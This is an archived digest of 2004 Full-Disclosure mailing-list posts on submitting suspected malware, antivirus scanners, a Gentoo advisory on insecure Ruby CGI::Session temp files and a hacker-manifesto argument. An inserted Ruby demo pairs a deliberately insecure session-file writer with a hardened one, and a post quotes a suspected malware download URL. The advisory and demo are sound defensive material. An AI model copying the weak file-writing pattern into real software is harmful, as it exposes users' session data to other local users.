> doesn't exist (the home page of that site is a text file containing
> only "SB2").
> I sent the file to virustotal.com and they found nothing.
> Where can I send this file for analysis?

The Internet Storm Center also has a malware analysis group, and they
coordinate with the major AV vendors; you can submit the file and
relevant information at http://isc.sans.org/contact.php or via email to
[EMAIL PROTECTED] (I think).

--
Kyle Maxwell
[EMAIL PROTECTED]



[Full-Disclosure] [ GLSA 200409-08 ] Ruby: CGI::Session creates files insecurely

2004-09-03 Thread Sune Kloppenborg Jeppesen
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200409-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Ruby: CGI::Session creates files insecurely
      Date: September 03, 2004
      Bugs: #60525
        ID: 200409-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

When used for CGI scripting, Ruby creates session files in /tmp with
the permissions of the default umask. Depending on that umask, local
users may be able to read sensitive data stored in session files.

Background
==========

Ruby is an Object Oriented, interpreted scripting language used for
many system scripting tasks. It can also be used for CGI web
applications.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  dev-lang/ruby          < 1.8.2_pre2                 *>= 1.6.8-r11
                                                          *>= 1.8.0-r7
                                                          >= 1.8.2_pre2

Description
===========

The CGI::Session::FileStore implementation (and presumably
CGI::Session::PStore), which allow data associated with a particular
Session instance to be written to a file, writes to a file in /tmp with
no regard for secure permissions. As a result, the file is left with
whatever the default umask permissions are, which commonly would allow
other local users to read the data from that session file.

Impact
======

Depending on the default umask, any data stored using these methods
could be read by other users on the system.

Workaround
==========

By changing the default umask on the system to not permit read access
to other users (e.g. 0700), one can prevent these files from being
readable by other users.

Resolution
==========

All Ruby users should upgrade to the latest version:

# emerge sync

# emerge -pv ">=dev-lang/ruby-your_version"
# emerge ">=dev-lang/ruby-your_version"

References
==========

  [ 1 ] CAN-2004-0755
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0755

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200409-08.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0


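An added example, not part of the advisory or of Ruby's own CGI::Session code, showing the permission problem the GLSA describes: a session file written with a plain File.open inherits the process umask, while creating it with O_EXCL and an explicit 0600 mode keeps it owner-only regardless of umask. The demo helper, its scratch directory and the sample session data are assumptions made for the demonstration.

```ruby
require 'tmpdir'

# Mimics the weak behaviour described in the advisory: the file's mode is
# whatever 0666 & ~umask yields, so a permissive umask (e.g. 022) leaves the
# session data readable by every local user.
def write_session_weak(path, data)
  File.open(path, 'w') { |f| f.write(data) }
  File.stat(path).mode & 0777
end

# Hardened variant: O_EXCL refuses to reuse a pre-existing name (such as a
# symlink planted in /tmp) and the explicit 0600 mode ignores the umask.
def write_session_hardened(path, data)
  File.open(path, File::WRONLY | File::CREAT | File::EXCL, 0600) do |f|
    f.write(data)
  end
  File.stat(path).mode & 0777
end

# True when the group or other read bits are set on the file.
def readable_by_others?(path)
  (File.stat(path).mode & 0044) != 0
end

# Runs both variants under the given umask inside a scratch directory and
# returns the observed modes; the caller's umask is restored afterwards.
def demo(umask_value)
  old = File.umask(umask_value)
  Dir.mktmpdir('ruby_sess') do |dir|
    weak = File.join(dir, 'weak_session')
    hard = File.join(dir, 'hard_session')
    {
      weak: write_session_weak(weak, 'user_id=42'),        # constructed data
      weak_exposed: readable_by_others?(weak),
      hardened: write_session_hardened(hard, 'user_id=42'),
      hardened_exposed: readable_by_others?(hard)
    }
  end
ensure
  File.umask(old) if old
end

if __FILE__ == $0
  p demo(0022)  # typical default umask: the weak file ends up 0644
  p demo(0077)  # the advisory's workaround: even the weak file is 0600
end
```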

[Full-Disclosure] Re: win2kup2date.exe ?

2004-09-03 Thread rmulraney
Oh dear me!
I thought something strange there; can anyone else see what's happening?
OK fools, how long do you think it can last? Stop engineering this list; all
concerned remove yourselves from this list immediately to maintain list integrity!
confused : ignore this message
worried : be more so, as it's easier to wake people up than to sing them to sleep - and
you are speeding up breakfast time
dreamers : is there a real FD anywhere?



Re: [Full-Disclosure] Re: win2kup2date.exe ?

2004-09-03 Thread devis
Touché !


Re: [Full-Disclosure] Where to submit a suspected trojan or virus?

2004-09-03 Thread Harlan Carvey

> > I found an explorer.exe in my system32 folder which I believe take
> > precedence over the real explorer.exe located in c:\windows.

The fact that there's a copy of this Explorer.exe in
System32 may be an issue.

Was there an application running?  Was there a
Registry entry related to this file?  If so, which
one?  How about another autostart location?

What do you mean by "I believe take precedence over
the real explorer.exe"?  How so?

There may be enough information associated with this
file such that you may not need to submit it to
anyone...there are things you can do to figure out
what the file is...



Re: [Full-Disclosure] Where to submit a suspected trojan or virus?

2004-09-03 Thread Kyle Maxwell
On Fri, 03 Sep 2004 06:00:27 +0200, Scenobro <[EMAIL PROTECTED]> wrote:
> I found an explorer.exe in my system32 folder which I believe takes
> precedence over the real explorer.exe located in c:\windows.
> It's a 92K file that seems to be a Visual Basic program. Among the
> strings contained in it there is a "C:\TestDL.exe" which I didn't find
> on my disk and a URL "http://www.getupdate.com/TestDownload.exe" which
> doesn't exist (the home page of that site is a text file containing only
> "SB2").
> I sent the file to virustotal.com and they found nothing.
> Where can I send this file for analysis?

The Internet Storm Center also has a malware analysis group, and they
coordinate with the major AV vendors; you can submit the file and
relevant information at http://isc.sans.org/contact.php or via email
to [EMAIL PROTECTED] (I think).

-- 
Kyle Maxwell
[EMAIL PROTECTED]



Re: [Full-Disclosure] The Hacker's Manifesto Reloaded

2004-09-03 Thread Hugo Vazquez Carapez

>..
>of intent, my manifesto, and it needs no
>end user license agreement or copyright. It is not unreasonable, it is
>not a declaration of war, it is a statement accompanying a point for
>discussion, nothing more.

>What do you think?

I think you suck.

Hugo Vazquez Carapez (Fishface)
Infohacking ev1l hax0rs (www.infohacking.com)
Senior Security Consultant at iDEFENSE labs (www.iDEFENSE.com)


RE: [Full-Disclosure] Where to submit a suspected trojan or virus?

2004-09-03 Thread John LaCour
Here's my list of vendor submission addresses, many of which
initially came from Nick Fitzgerald.

[EMAIL PROTECTED]
avsubmit.symantec.com
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]
[EMAIL PROTECTED]


Most of these want you to send it in a password protected zip
file with a password 'infected'.  Some of them want the password
to be 'virus'.  I tend to just send two zip files to everyone
on my distribution list.

If anyone knows of any others, I'd appreciate the info.

-John

> -Original Message-
> From: Scenobro [mailto:[EMAIL PROTECTED] 
> Sent: Thursday, September 02, 2004 9:00 PM
> To: [EMAIL PROTECTED]
> Subject: [Full-Disclosure] Where to submit a suspected trojan 
> or virus?
> 
> 
> I found an explorer.exe in my system32 folder which I believe takes
> precedence over the real explorer.exe located in c:\windows.
> It's a 92K file that seems to be a Visual Basic program. Among the
> strings contained in it there is a "C:\TestDL.exe" which I didn't find
> on my disk and a URL "http://www.getupdate.com/TestDownload.exe" which
> doesn't exist (the home page of that site is a text file containing only
> "SB2").
> I sent the file to virustotal.com and they found nothing.
> Where can I send this file for analysis?
> 



[Full-Disclosure] Multi-vendor AV scanning without sending a sample

2004-09-03 Thread John LaCour
If you don't want to use something like www.virustotal.com to scan 
suspected malware, then use the activex web based scanners of 
several vendors.  It's a bit more time consuming, but then you 
don't end up sending anyone your sample.  

Here's a list (a few actually do require you to upload the sample).
If anyone knows of any others, please send me the info.


AhnLab Inc.
http://info.ahnlab.com/english/myv3/myv3.html

Bit Defender
http://www.bitdefender.com/scan/Msie/index.php

ClamAV
http://www.gietl.com/test-clamav/

Command AV(requires registration)
http://www.commandondemand.com/

Computer Associates
http://www3.ca.com/threatinfo/virusinfo/scan.aspx

F-Secure
http://support.f-secure.com/enu/home/ols.shtml

Hauri
http://www.globalhauri.com/html/onlineservice/livecall_service.html

Kaspersky
http://www.kaspersky.com/remoteviruschk.html

McAfee
http://www.mcafee.com/myapps/mfs/default.asp

Panda
http://www.pandasoftware.com/activescan/com/activescan_principal.htm

RAV
http://www.ravantivirus.com/scan/indexie.php

Symantec (Scans entire system)
http://security.symantec.com/default.asp?productid=symhome&langid=ie&venid=sym

Trend Micro
http://housecall.trendmicro.com/housecall/start_corp.asp

Regards,
John



Re: [Full-Disclosure] Re: Microsoft Update Loader msrtwd.exe

2004-09-03 Thread Harlan Carvey
> When I first posted, I didn't have the EXE. When I
> did receive a copy of the file, I was told I cannot
> send it outside of the network.
>
> Besides, I've been on this list long enough to know
> that questions like mine are asked from time to
> time.

If that's really the case, you should have known what
the response would be.  When you first posted, you
seemed to have absolutely nothing to go on, even the
file itself.  As Nick and others have pointed out
several times, filenames are next to useless.

In your original post, you said, "It's listed in the
Registry as "Microsoft Update Loader"", but you
couldn't say *where* in the Registry it was listed as
such.  Are we then to assume that you were referring
to the Run key?  Which hive?  Better yet, if you know
that it's in the Registry, why not simply state which
key it's located in?

From one of your responses in the thread:
> "There were about 6 Registry entries in the HKLM
> section. I don't have the compromised machine, so I
> cannot tell you the exact locations.
>
> We ran TCPview on the compromised machine and
> watched it connect to an IRC server.

Okay, so you didn't *have* the compromised machine
when I asked the question, but at one point you and
someone else were sitting at the console of that
system running TCPView, and at no point could anyone
export the Registry entries to a text file or even
simply write down the keys.  

Since you eventually were able to get the .exe file
itself, did you run strings on it?  Check it for file
version info (some IRC bots, such as the russiantopz
bot, simply use mIRC32.exe as its core)?

You said you've been on the list for a while, so I
guess one question to ask you is, did you do
*anything* besides post to the list?




Re: [Full-Disclosure] RES: Instant Messenger

2004-09-03 Thread Über GuidoZ
I can't point you towards any white papers unfortunately, however I
CAN point you towards an application that I have found most useful for
securing IM conversations.

http://www.secway.fr/products/simplite_msn/home.php

The free version is for personal use and trial. Their pro version
(only around $22 USD) will encrypt just about ANY mainstream IM you
may use. Definitely worth a look (for anyone) if you haven't seen it
yet. Very easy to use and set up, which I find a necessity when trying
to communicate with clients using it. (I can include the free version
in an email or on a CD to them and give them instructions to install
it.)

-- 
Peace. ~G


On Fri, 3 Sep 2004 11:42:31 -0300, Alexandre Cezar <[EMAIL PROTECTED]> wrote:
> Take a look at http://www.akonix.com for securing IM communication and
> I recommend this paper
> www.giac.org/practical/GSEC/Frank_Reiss_GSEC.pdf
> 
> Regards
> -Original Message-
> From: Ido Rosen [mailto:[EMAIL PROTECTED]
> Sent: Thursday, 2 September 2004 23:17
> To: Murtland, Jerry
> Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED];
> [EMAIL PROTECTED]
> Subject: Re: Instant Messenger
> 
> Jabber.
> 
> On Thu, 2 Sep 2004 10:00:18 -0400
> "Murtland, Jerry" <[EMAIL PROTECTED]> wrote:
> 
> > I am looking for white papers on enterprise Instant Messenger security
> > concerns.  It doesn't have to be, but anything on MSN IM would be
> > helpful too.  Does anyone have any good resources to share?
> >
> > Jerry J. Murtland
> >
> >
> >
> 
> --
> +-+
> |  Email : [EMAIL PROTECTED] / [EMAIL PROTECTED] |
> | Jabber : [EMAIL PROTECTED]  |
> |PGP : http://www.dork.com/ido|
> +-+



Re: [Full-Disclosure] win2kup2date.exe ?

2004-09-03 Thread Nick FitzGerald
James Tucker to Harlan Carvey to me to :

> > > > > ...  If you want to email me a copy of it, I'll
> > > > > rip it apart and see what can be seen.
> > > >
> > > > And world plus dog should entrust you with such
> > > > material because???
> > >
> > > ... most viruses, trojans and malware do not store
> > > copies of stolen data in their executables. Furthermore
> > > the file size is very small.
> >
> > Interesting answer, but a complete non sequitur.  Nick
> > asked why this person should be trusted with a live
> > bit of malware, and your response is that it's not
> > very big???  What does that have to do with anything?
>
> Malware and viruses are VERY readily available in many places across
> the internet. Therefore this point should be of no concern.  ...

It feels good when you stop hitting your head against the door too, and 
there are very many doors readily available for you to hit your head 
against.  Now, I don't know James, but I'd say it is a fair bet he 
doesn't hit his head against every door he sees just so he can enjoy 
the feeling when he stops hitting his head against each specific door.

Look fool -- just because samples of some malware are easily accessible 
to you does not mean it is a good idea to encourage others to liberally 
spray copies of probably-new-and-undetected-by-many-scanners malware 
around willy nilly.  Such encouragement is ethically dubious, at 
best...

> ...  The only
> other concern which may be important is the possibility that the
> binary is carrying data from the infected system; it was this that I
> was referring to. Please accept my apology for not making this clearer.

And that was all but irrelevant to my concerns.  It is a possibility, 
and all the more reason to be sure that you really are sending your 
suspect files to a "true professional" but almost by definition, some 
arbitrary twit popping up in a mailing list or newsgroup saying "email 
me a copy of it, I'll rip it apart and see what can be seen" is _NOT_ 
such a person.  (And, if you look at the website at the domain of his 
preferred address for receiving "suspect" files, you have to question 
even further the suitability of this person...)

> > > > > P.S. Send it to [...] - it's my "catch all" for
> > > > > virus/unknown files. Just be sure to ZIP it up
> > > > > or else the web host won't let it through.
> > > > > Otherwise I have disabled all checks/scan.
> > > > > Downloads directly to a secured Linux box.
> > > >
> > > > That's all very nice, but alone, far from the
> > > > makings of someone to entrust arbitrary,
> > > > suspected malware samples to.
> > >
> > > "Entrust", just what exactly are you thinking you
> > > might be giving away?
> > 
> > Well, it's pretty obvious...a live bit of malware.
> > It's really pretty obvious what Nick's getting
> > at...why send this malware to some arbitrary person?
> > Who's to say that he's going to use it as he says, and
> > not send it back out to someone else?
> 
> To what end? It would be much more useful to an attacker to go and
> collect and customise one of the many readily available trojans on the
> internet, rather than spreading malware which they have no control
> over. IMHO your concern is closer to cynicism than practical reality.

Without knowing what the malware in question was or the skills of the 
recipient (assuming, for a moment, that they may actually have had bad 
intentions), you cannot even begin to decide what is easier for them.  
Also, studying something that turned out to be entirely new may give 
someone with ill intent a better idea of how to beat the odds with 
their next release.

But of course, that doesn't matter because the Internet is full of 
nasties so a few more makes no difference, eh James?

Have you hit your head against that door just over to your right 
recently?  A few really hard thwacks will be especially satisfying...

> > > Samples of non-data carrying viruses or
> > > trojans are of
> > > little use to anyone other than Anti-Virus firms, as
> > > it is easy to
> > > collect raw source for most if one is so inclined.

Malware source code is all but useless to the AV industry.  It has to 
detect the actual code that ends up in actual malware which mostly 
means the binary output of compilation and linking.  Having the source 
may help one work out a few wrinkles that the reverse engineering 
analysis did not resolve (usually because the time/effort/payoff 
estimates suggested it was not worthwhile).  Such code is especially 
useful to the wannabe virus writer though, and almost never to 
professional AV researchers as, in the cases where source is released, 
it usually is not released until well after the AV'ers have analysed 
actual samples, added detection (and removal, etc) to their products 
and long since moved on.

I guess your inability to comprehend this before writing the drivel 
above tells us even more about the value of your opinions about the 
desirability of sending arbitrary suspect cod

Re: [Full-Disclosure] [VirusTotal] Scan result (fwd)

2004-09-03 Thread Über GuidoZ
> You know Vgrep (http://www.virusbtn.com/resources/vgrep/index.xml) ?

No, I didn't. Thanks. =) You do bring up very valid points about the
virus Db and such. Something many people may not be thinking of.
Antivirus isn't my forte, although I do try to keep informed as it's
part of my job. Appreciate the comments.

-- 
Peace. ~G


On Fri, 3 Sep 2004 11:31:27 +0200, Michel Messerschmidt
<[EMAIL PROTECTED]> wrote:
> On Thu, Sep 02, 2004 at 04:01:16PM -0400, Über GuidoZ wrote:
> > It's kind of interesting to see the results, as it shows you what AV
> > programs seem to detect things better then others.
> 
> I think this is actually misleading.
> You know nearly nothing from scanning just a single (or 10, 50,...)
> sample. And there are other basic test requirements. For example:
> - the different results could be due to differences in the update
>   schedule at virustotal.com (some vendors offer their fastest updates
>   only for premium licenses, which virustotal may not have).
> - maybe some products are used with optimized settings (for example
>   maximum heuristic detection) and others with default settings.
> 
> > It's also useful
> > for known viruses, but needing to know what each AV program calls
> > them. (I find this useful when trying to do tech support.)
> 
> You know Vgrep (http://www.virusbtn.com/resources/vgrep/index.xml) ?
> 
> --
> Michel Messerschmidt   [EMAIL PROTECTED]
> antiVirusTestCenter, Computer Science, University of Hamburg



Re: [Full-Disclosure] Empirical data surrounding guards and firewalls.

2004-09-03 Thread Manohar G Singh
Yep, very true. Especially if some of them happen to be of the fairer
sex, and happen to be missing a few buttons.  (the buttons, is there
an analogy to this in the 'Virtual World'?)


;-)


MN Vasquez wrote:

Hrm.  I think if enough people wearing only shirts and shoes ran into
McDonald's, at least some of them would get in, and not be blocked by the
rule.


- Original Message - 
From: "James Tucker" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Thursday, September 02, 2004 3:15 PM
Subject: Re: [Full-Disclosure] Empirical data surrounding guards and
firewalls.

Apologies, please explain the lack of differences, I'm not getting them.

Virtual:
"The door" - Port 80 - Closed after connection attempt. You come back,
it does the same, and then closes again. 404 Error not being
dissimilar to being told to get out.

Real:
Cops show up - As with the firewall, it does not actively stop you
from reconnecting. McDonald's staff did not prevent you from
re-entering the premises themselves.

Measures in Both:
In the event of reconnection attempts the firewall logs would indicate
an attack and external policing would have to deal with the problem.

As far as I can see it the only difference is scaling, you can make
many many millions of requests before a flood warning appears, whereas
you only need to refuse to leave a few times before the police are
called. I guess humans have less patience than computers.

Of course I could be missing something?

Oh yeah, I did miss something, you can't "disconnect" someone from
being present in the building, as you can with a socket on a server.
But with reconnection scaling, is that really relevant? A little,
moreso in some circumstances, but not in this one.

Why complain about analogies when your response contains analogies
such as this one?

Did you really go into McDonald's and harass the staff today and get
taken away by the police? Please say yes, that would make my day. ROFL
:)


On Thu, 2 Sep 2004 14:45:56 -0500 (CDT), [EMAIL PROTECTED]
<[EMAIL PROTECTED]> wrote:


  Target:
--
-Firewall
-McDonald's guard

Materials:
-
-(1) Evol
-(1) Shoes
-(1) Shirt
-(1) Computer
-(1) Internet connection
-(1) Firewalled host

Procedure:
-
For each target, undergo the following steps:

1.) Enumerate an acceptable entrance policy.
2.) Attempt to enter while following entrance policy.

Data:
-
Firewall:

The firewall at internet host www.mcdonalds.com accepts
connections to TCP/IP port 80.  Rules are similar to
'DENY ALL EXCEPT TCP PORT 80'  So make connection to port 80
and note results.
Results:
---
Normal transaction was accepted.  See results:

HTTP/1.1 400 Bad request
Server: Netscape-Enterprise/4.1
Date: Thu, 02 Sep 2004 XX:XX:XX GMT
Content-length: 147
Content-type: text/html
Connection: close

Store:
-
The store at the location closest to me was chosen as a
specific target.  The entrance policy is:
'IF (NOT SHOES) OR (NOT SHIRT) DENY'
So, evol enters store with only shoes and a shirt.

Data:

Evol was rejected conduction of normal business.  No
Big Mac today, get out!  Then, when Evol tries to
proceed anyway, cops take Evol out of McDonalds.

Conclusion:
--
People and firewalls are different.


[Full-Disclosure] RES: Instant Messenger

2004-09-03 Thread Alexandre Cezar
Take a look at http://www.akonix.com for securing IM communication and 
I recommend this paper 
www.giac.org/practical/GSEC/Frank_Reiss_GSEC.pdf


Regards
-Original Message-
From: Ido Rosen [mailto:[EMAIL PROTECTED]
Sent: Thursday, 2 September 2004 23:17
To: Murtland, Jerry
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED];
[EMAIL PROTECTED]
Subject: Re: Instant Messenger

Jabber.

On Thu, 2 Sep 2004 10:00:18 -0400 
"Murtland, Jerry" <[EMAIL PROTECTED]> wrote:

> I am looking for white papers on enterprise Instant Messenger security
> concerns.  It doesn't have to be, but anything on MSN IM would be
> helpful too.  Does anyone have any good resources to share?
> 
> Jerry J. Murtland
> 
> 
> 


-- 
+-+
|  Email : [EMAIL PROTECTED] / [EMAIL PROTECTED] |
| Jabber : [EMAIL PROTECTED]  |
|PGP : http://www.dork.com/ido|
+-+



[Full-Disclosure] Re: Instant Messenger

2004-09-03 Thread Ido Rosen

Jabber.

On Thu, 2 Sep 2004 10:00:18 -0400 
"Murtland, Jerry" <[EMAIL PROTECTED]> wrote:

> I am looking for white papers on enterprise Instant Messenger security
> concerns.  It doesn't have to be, but anything on MSN IM would be
> helpful too.  Does anyone have any good resources to share?
> 
> Jerry J. Murtland
> 
> 
> 


-- 
+-+
|  Email : [EMAIL PROTECTED] / [EMAIL PROTECTED] |
| Jabber : [EMAIL PROTECTED]  |
|PGP : http://www.dork.com/ido|
+-+




Re: [Full-Disclosure] The Hacker's Manifesto Reloaded

2004-09-03 Thread the entrepreneur
James,
A nice manifesto indeed. But in no way does it
correlate to the one which I have written (or
probably modified). Maybe the sarcasm is not
noticeable, maybe you missed it, maybe because we are
different people altogether.
Well, I am here because I am anti-authoritative, a
negated personality (I hate to call it that because
the fundamental idea of its emergence was this growth
of negative activity, this was root for Pete's sake!).
Maybe you suppressed your impulses, or are vehemently
denying it.
Well, it's synonymous with rap songs: they are violent,
they are bad, but we listen, with that fetish look in
our eyes. Maybe you listen to it too or maybe not, but
there is always one vantage point where you blow off your
steam, about your very inner conscience.
My conscience was the conscience of this Manifesto;
it manifests the "hummm..." sound some people will make
when they read it. It's for them.
If not for them, lest it's for me.
EULA might not cover it (how can you miss the pun
there?), but the First Amendment will. hehe.

Am I spared?

-Regards
The Entrepreneur  
--- James Tucker <[EMAIL PROTECTED]> wrote:

> A short piece of food for thought for all you
> hackers out there. This
> is not an attack on your livelihood this is merely a
> point for your
> consideration.
> 
> It (the manifesto) does not explain why this
> information is relevant
> for me to read, or maybe I am unable to understand
> the part that does,
> if so please teach this willing student.
> 
> Your manifesto seems largely similar to those
> written by many others.
> The attacks upon the security industry (which is
> required, whether the
> techs are good or not is a different matter) are
> largely unqualified.
> Please do not forget that businesses are formed due
> to the needs of
> other businesses or people and they serve others,
> this leads in a
> chain like manner back to the industries you would
> choose not to
> attack.
> 
> Tell me how would you feel if you successfully stole
> enough money that
> you crashed an economy and power generation also
> stopped. An unreal
> scenario I know, but tone this back down to reality,
> and you realise
> that the things you are using are also directly
> related to the things
> you are trashing. In essence you are destroying your
> own world.
> 
> It is business that makes computers, it is power
> that feeds the
> factories, it is these people's money that pays the
> employees. The
> employees need health insurance if they want to
> survive, hospitals
> need their equipment, which in turn requires design,
> logistics for
> movement of physical items. The logistics companies
> need ISPs for
> their communications infrastructure, and banks to
> manage their money.
> The trail goes on. Do you not realise that many of
> the places you
> attack are merely part of the chain of business
> which supports the
> world that you love?
> 
> A final point to further this, how far are you
> willing to go in
> causing people inconvenience? Every day people
> commit suicide due to
> stress caused to them in their business lives.
> Shutting down
> communications media, or any other business could
> have this effect (or
> at least contribute). Even furthermore there are
> situations where your
> actions may more directly affect the safety of
> individuals. Continuing
> to do so may then be compared to attempted murder.
> Still think you
> have any moral high ground?
> 
> Finally the word manifesto means "a declaration of
> intent". I was
> unable to see any intended actions stated. In fact
> what I read more
> resembled a boast of money gained by actions already
> performed, and
> insult of lesser hackers and security professionals.
> For someone who
> should have a clear understanding of the need for
> accurate
> understanding of language (most important when the
> language is dealt
> with on a purely logical and explicit basis as with
> a computer system)
> you seem to not care so much about the accuracy of
> your written
> language.
> 
> ---
> 
> I am a student of security and this is my manifesto.
> I intend to have
> any hacker who tries to attack me for trying to
> provide an explanation
> of my point of view to them, thrown into jail for
> the longest sentence
> available under the laws of the country in which
> they committed their
> crime. This is my statement of intent, my manifesto,
> and it needs no
> end user license agreement or copyright. It is not
> unreasonable, it is
> not a declaration of war, it is a statement
> accompanying a point for
> discussion, nothing more.
> 
> What do you think?
> 
> 
> On Fri, 3 Sep 2004 05:45:19 -0700 (PDT), the
> entrepreneur
> <[EMAIL PROTECTED]> wrote:
> > it says everything.
> > 
> > 
> > --- James Tucker <[EMAIL PROTECTED]> wrote:
> > 
> > > why?
> > >
> > > On Fri, 3 Sep 2004 03:31:32 -0700 (PDT), the
> > > entrepreneur
> > > <[EMAIL PROTECTED]> wrote:
> > > > The following was written shortly after my
> > > > placement...
> > > >
> > > >\

Re: [Full-Disclosure] The Hacker's Manifesto Reloaded

2004-09-03 Thread James Tucker
A short piece of food for thought for all you hackers out there. This
is not an attack on your livelihood this is merely a point for your
consideration.

It (the manifesto) does not explain why this information is relevant
for me to read, or maybe I am unable to understand the part that does;
if so please teach this willing student.

Your manifesto seems largely similar to those written by many others.
The attacks upon the security industry (which is required, whether the
techs are good or not is a different matter) are largely unqualified.
Please do not forget that businesses are formed due to the needs of
other businesses or people and they serve others, this leads in a
chain like manner back to the industries you would choose not to
attack.

Tell me how would you feel if you successfully stole enough money that
you crashed an economy and power generation also stopped. An unreal
scenario I know, but tone this back down to reality, and you realise
that the things you are using are also directly related to the things
you are trashing. In essence you are destroying your own world.

It is business that makes computers, it is power that feeds the
factories, it is these people's money that pays the employees. The
employees need health insurance if they want to survive, hospitals
need their equipment, which in turn requires design, logistics for
movement of physical items. The logistics companies need ISPs for
their communications infrastructure, and banks to manage their money.
The trail goes on. Do you not realise that many of the places you
attack are merely part of the chain of business which supports the
world that you love?

A final point to further this, how far are you willing to go in
causing people inconvenience? Every day people commit suicide due to
stress caused to them in their business lives. Shutting down
communications media, or any other business could have this effect (or
at least contribute). Even furthermore there are situations where your
actions may more directly affect the safety of individuals. Continuing
to do so may then be compared to attempted murder. Still think you
have any moral high ground?

Finally the word manifesto means "a declaration of intent". I was
unable to see any intended actions stated. In fact what I read more
resembled a boast of money gained by actions already performed, and
insult of lesser hackers and security professionals. For someone who
should have a clear understanding of the need for accurate
understanding of language (most important when the language is dealt
with on a purely logical and explicit basis as with a computer system)
you seem to not care so much about the accuracy of your written
language.

---

I am a student of security and this is my manifesto. I intend to have
any hacker who tries to attack me for trying to provide an explanation
of my point of view to them, thrown into jail for the longest sentence
available under the laws of the country in which they committed their
crime. This is my statement of intent, my manifesto, and it needs no
end user license agreement or copyright. It is not unreasonable, it is
not a declaration of war, it is a statement accompanying a point for
discussion, nothing more.

What do you think?


On Fri, 3 Sep 2004 05:45:19 -0700 (PDT), the entrepreneur
<[EMAIL PROTECTED]> wrote:
> it says everything.
> 
> 
> --- James Tucker <[EMAIL PROTECTED]> wrote:
> 
> > why?
> >
> > On Fri, 3 Sep 2004 03:31:32 -0700 (PDT), the
> > entrepreneur
> > <[EMAIL PROTECTED]> wrote:
> > > The following was written shortly after my
> > > placement...
> > >
> > > \/\The Conscience of a Hacker - Redux /\/
> > > (c)CopyRight SuppaDuppaSecurity Solutions.
> > > *where do u wanna pee today*
> > > by
> > >
> > > +++The Entrepreneur+++
> > >
> > > Written on September 3, 2004.
> > >
> > > Another one got bought today, it's all over the Wall
> > > Street.  "Teenager Floated A Big Security Company",
> > > "Hacker Paid After Ethical Hacking Of A Bank..."
> > > Damn kids.  They're all money whores.
> > >
> > > But did you, in your C Grade Economics Degree and
> > > l4am3 technobrain, ever take a look behind the eyes of
> > > this professional hacker?  Did you ever wonder what
> > > made him whored, what forces lured him, what may have
> > > sold him?
> > > I am a professional hacker, look at my bank
> > > account...
> > >
> > > Mine is a world that begins with money... I'm richer
> > > than most of the other kids, this crap they buy is so
> > > darn cheap...
> > > Damn underachiever.  They're all money whores.
> > >
> > > I'm a junior security consultant.  I've listened to
> > > senior security professionals about how to be a good
> > > hacker.
> > > I spit at it.  "No, Mr.Ni

Re: [Full-Disclosure] [VirusTotal] Scan result (fwd)

2004-09-03 Thread joe smith
> Unless for (a purely theoretical) example the website would use your
> submission to infect others

Right, that is what I'm concerned about.  I do not know the intention of virustotal.com, or their policy on the binaries they receive.  The parent site (http://www.hispasec.com/) does not offer more information.  I believe the intention may be good, but I have some lingering suspicion that *free* services that have you send in a binary may be the elaborate work of vx traders.  (cue the conspiracy theories)

Me submitting the virus to someone counts as distributing the virus (according to the lawyers).  I've been warned by lawyers about such things.  I should add that the lawyers have no problem if I submit the sample to an AV company.  It's more of a CYA than anything else.

J
Michel Messerschmidt wrote:
> On Fri, Sep 03, 2004 at 10:43:50AM +0530, Aditya Deshmukh wrote:
> > hey if the binary is infected and does not contain any hardcoded
> > sensitive info what do u care about the owners of the website ?
>
> Unless for (a purely theoretical) example the website would use your
> submission to infect others (perhaps with your address as sender) :-)
> Although the binary may not contain any sensitive data, it is dangerous
> in itself because it is self-replicating and thus hard to control once
> it is activated. If you are not very cautious when handling
> self-replicating code, you most likely end up sending it out to the
> world.
>
> So for the question how to handle possibly dangerous code
> it all comes down to "Who do you trust" ?

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] [VirusTotal] Scan result (fwd)

2004-09-03 Thread Barry Fitzgerald
Michel Messerschmidt wrote:
> On Fri, Sep 03, 2004 at 10:43:50AM +0530, Aditya Deshmukh wrote:
> > hey if the binary is infected and does not contain any hardcoded
> > sensitive info what do u care about the owners of the website ?
>
> Unless for (a purely theoretical) example the website would use your
> submission to infect others (perhaps with your address as sender) :-)
> Although the binary may not contain any sensitive data, it is dangerous
> in itself because it is self-replicating and thus hard to control once
> it is activated. If you are not very cautious when handling
> self-replicating code, you most likely end up sending it out to the
> world.
>
> So for the question how to handle possibly dangerous code
> it all comes down to "Who do you trust" ?

Or, potentially, use the fact that you're infected with something 
against you.  Like, say, holding a red flag up saying that you're 
backdoored.

I have no evidence to suggest that that's what's going on -- just 
bringing it up as something someone can possibly gain from a submission 
of this type.

-Barry
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


